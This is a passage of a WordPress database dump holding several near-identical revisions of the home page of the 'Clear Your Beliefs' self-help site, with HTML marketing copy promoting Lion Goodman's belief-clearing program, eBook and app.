(1527, 2, '2014-10-09 23:09:07', '2014-10-10 04:09:07', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 23:09:07', '2014-10-10 04:09:07', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1528, 2, '2014-10-09 23:10:22', '2014-10-10 04:10:22', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n<h3 style="text-align: center">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p style="margin-left: 45px"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p><p> </p>Copyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 23:10:22', '2014-10-10 04:10:22', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1530, 2, '2014-10-09 23:16:58', '2014-10-10 04:16:58', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 160px"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 23:16:58', '2014-10-10 04:16:58', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1531, 2, '2014-10-09 23:19:41', '2014-10-10 04:19:41', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 160px;margin-bottom: 0px"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 23:19:41', '2014-10-10 04:19:41', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1532, 2, '2014-10-09 23:24:53', '2014-10-10 04:24:53', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px;margin-bottom: 0px"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 23:24:53', '2014-10-10 04:24:53', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1533, 2, '2014-10-09 23:42:57', '2014-10-10 04:42:57', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5">ith </strong><strong>Clear Your Beliefs</strong>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs<p>What You Can Accomplish with Clear Your Beliefs How and Why It Works</p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p>\n</p>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they liveAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)You take charge and decide what you want to believeYou’re guided gently, step-by-step, through the entire processYou decide how far to go, and what changes to make<p></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 23:42:57', '2014-10-10 04:42:57', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
